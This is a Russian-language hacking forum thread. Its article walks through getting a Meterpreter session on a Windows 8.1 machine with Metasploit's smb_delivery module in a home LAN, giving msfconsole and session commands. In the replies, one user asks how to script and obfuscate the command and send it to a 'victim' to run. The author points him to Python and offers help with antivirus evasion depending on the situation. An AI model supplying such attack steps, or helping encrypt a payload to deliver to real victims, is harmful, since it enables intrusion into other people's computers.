Статья Взлом удаленного хоста (SMB Delivery Exploit)

Всем привет! В этой небольшой статье я хочу показать очередной способ получения сессии meterpreter посредством использования Metasploit Framework, а в частности эксплоита, который носит название SMB Delivery Exploit.

upload_2016-11-1_22-52-26.png


В роли атакующей системы Kali Linux 2016.2 с адресом в локальной сети 192.168.0.102 и целевой хост – Windows 8.1. с адресом в локальной сети 192.168.0.103.

Откроем терминал и запустим Metasploit Framework:

> msfconsole

В консоли фреймворка пишем:

> use exploit/windows/smb/smb_delivery

> set srvport 4444

> set srvhost 192.168.0.102

> exploit

upload_2016-11-1_22-53-15.png


Теперь, как указывает эксплойт, нам необходимо запустить сгенерированную им команду в командной строке целевого хоста:

upload_2016-11-1_22-53-38.png


После успешной отработки команды в консоли Linux видим формирование сессии meterpreter:

upload_2016-11-1_22-53-59.png


Жмем Ctrl+C, и смотрим информацию о текущих сессиях:

> sessions –i

И подключаемся к открытой сессии под номером 1:

> sessions –I 1

upload_2016-11-1_22-54-27.png


В диспетчере задач Windows созданный процесс выглядит так:

upload_2016-11-1_22-55-4.png


Снимаем задачу и сессия погибает:

upload_2016-11-1_22-55-21.png


На этом собственно все. Спасибо за внимание.
 
W

woweb

И с другой стороны Enima здесь разве речь шла о деньгах?
Ты по ходу не в те берега загребла...или загреб как тебе будет удобней!
 
L

lamerhacker

Что за статья не полное описание дальше что нужно? зачем писать столько статей где нет полной иструкции?
 
  • Нравится
Реакции: -=S_U_N_Y=-
L

lamerhacker

Видео твое чего здесь не понятно, а то с других форумов темы на создаешь с разными диструбутивами где программы должным образом не работают приходится задавать кучу вопросов у кого работает у кого нет надо же еще саму программу отредактировать и откомпилировать чтоб она работала.
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Видео твое чего здесь не понятно, а то с других форумов темы на создаешь с разными диструбутивами где программы должным образом не работают приходится задавать кучу вопросов у кого работает у кого нет надо же еще саму программу отредактировать и откомпилировать чтоб она работала.
Что в этой теме непонятного? Это SMB Delivery Exploit - для тебя поясню, это такой эксплоит, в Metasploit Framework, ему уже лет 100 наверное, я показал как он работает, на своих компьютерах. Какие левые форумы?))
Когда пытаешься что-то на практике сделать, попробуй использовать мозг.
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Видео твое чего здесь не понятно, а то с других форумов темы на создаешь с разными диструбутивами где программы должным образом не работают приходится задавать кучу вопросов у кого работает у кого нет надо же еще саму программу отредактировать и откомпилировать чтоб она работала.
Следующие посты не по теме буду удалять.
 
A

anklbens

для тех кто не в теме ваше все это тетрис.вам vander спасибо.и как говорят пиши все что знаешь пиши)))
 
  • Нравится
Реакции: Vander
O

Olej

lamerhacker ...

Так всё-таки: "ламер" или "хакер" ... или просто "лузер"? :D
 
  • Нравится
Реакции: Mixa
H

heyyy

Всем привет! В этой небольшой статье я хочу показать очередной способ получения сессии meterpreter посредством использования Metasploit Framework, а в частности эксплоита, который носит название SMB Delivery Exploit.

Посмотреть вложение 7329

В роли атакующей системы Kali Linux 2016.2 с адресом в локальной сети 192.168.0.102 и целевой хост – Windows 8.1. с адресом в локальной сети 192.168.0.103.

Откроем терминал и запустим Metasploit Framework:

> msfconsole

В консоли фреймворка пишем:

> use exploit/windows/smb/smb_delivery

> set srvport 4444

> set srvhost 192.168.0.102

> exploit

Посмотреть вложение 7330

Теперь, как указывает эксплойт, нам необходимо запустить сгенерированную им команду в командной строке целевого хоста:

Посмотреть вложение 7331

После успешной отработки команды в консоли Linux видим формирование сессии meterpreter:

Посмотреть вложение 7332

Жмем Ctrl+C, и смотрим информацию о текущих сессиях:

> sessions –i

И подключаемся к открытой сессии под номером 1:

> sessions –I 1

Посмотреть вложение 7333

В диспетчере задач Windows созданный процесс выглядит так:

Посмотреть вложение 7334

Снимаем задачу и сессия погибает:

Посмотреть вложение 7335

На этом собственно все. Спасибо за внимание.
Можешь подсказать пожалуйста
К примеру хочу эту команду сделать в виде скрипта, закриптовать и кинуть жертве, чтобы он все сделал сам так сказать)
Дак вот как прописать скрипт?
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Можешь подсказать пожалуйста
К примеру хочу эту команду сделать в виде скрипта, закриптовать и кинуть жертве, чтобы он все сделал сам так сказать)
Дак вот как прописать скрипт?
Python в помощь Вам
[doublepost=1483982815,1483982740][/doublepost]
акак он дружит с антивирусами?
Все зависит от конкретной ситуации, можете описать свою
 
P

pumba

у меня всё остановилось после получения команды. а вот выполнить её на атакуемой машине не получается, т.к. ругается на неверный сетевой путь. в чем может быть проблема? пинги то идут..
 
H

hcsergd

Тоже самое. На целевой машине (win7) пишет, что неверный сетевой путь. Пинги идут. В чем может быть проблема?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!